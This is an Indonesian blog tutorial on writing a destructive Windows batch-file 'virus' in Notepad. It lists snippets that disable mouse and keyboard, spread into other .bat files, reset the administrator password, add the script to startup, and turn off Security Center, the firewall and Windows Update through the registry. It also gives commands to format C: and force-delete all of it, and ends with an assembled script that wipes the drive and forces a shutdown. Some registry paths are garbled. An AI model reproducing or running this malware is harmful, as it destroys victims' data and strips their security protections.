Virus ini dibuat dg Notepad dan di save as dg ekstension .bat
Jgn lupa utk merubah Save as type menjadi All files
BASIC
invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
buka URL yg diinginkan
start
[url]http://www.google.com[/url]
Shutdown
kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart
rundll32 mouse,disable
Disable keyboard stlh Restart
rundll32 keyboard,disable
Freezes kmptr stlh Restart
rundll32 user,disableoemlayer
Worm
memperbanyak diri didlm direktori
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
me-replace file batch yg lainfor %%i in (*.bat) do copy %0+%%i %%i /y >nul"
%0 >>other.bat
Trojan
mngirim dftar file dlm direktori
dir *.*>>Filelist.txt
ganti password admin
net user administrator
PASSWORD HERE
membuat info IP
ipconfig
>Computer-IP-address.txt
Perusak
copy ke Autorun
COPY %0 %windir%WINSTART.BAT
format drive C
format c: /q /autotest
delete Windows
DELTREE /Y %windir%
delete
drive C dg paksa
DEL
/F /S /Q C:
mematikan firewall
& security center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
Pause
pause smpai tekan smbarang tombol
pause
pause 20 detik
@ping.exe 127.0.0.1 -n 20 -w
1000 > nul
Berikut hasil akhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
-disables mouse
& keyboardcls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
-copy ke AUTORUN
-stop Security Center
-display "Anda kena VIRUS!!!" selama 5 detik
-starts [url]http://www.youtube.com[/url]
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkan selamat tinggal pada komputermu!"
Tidak ada komentar:
Posting Komentar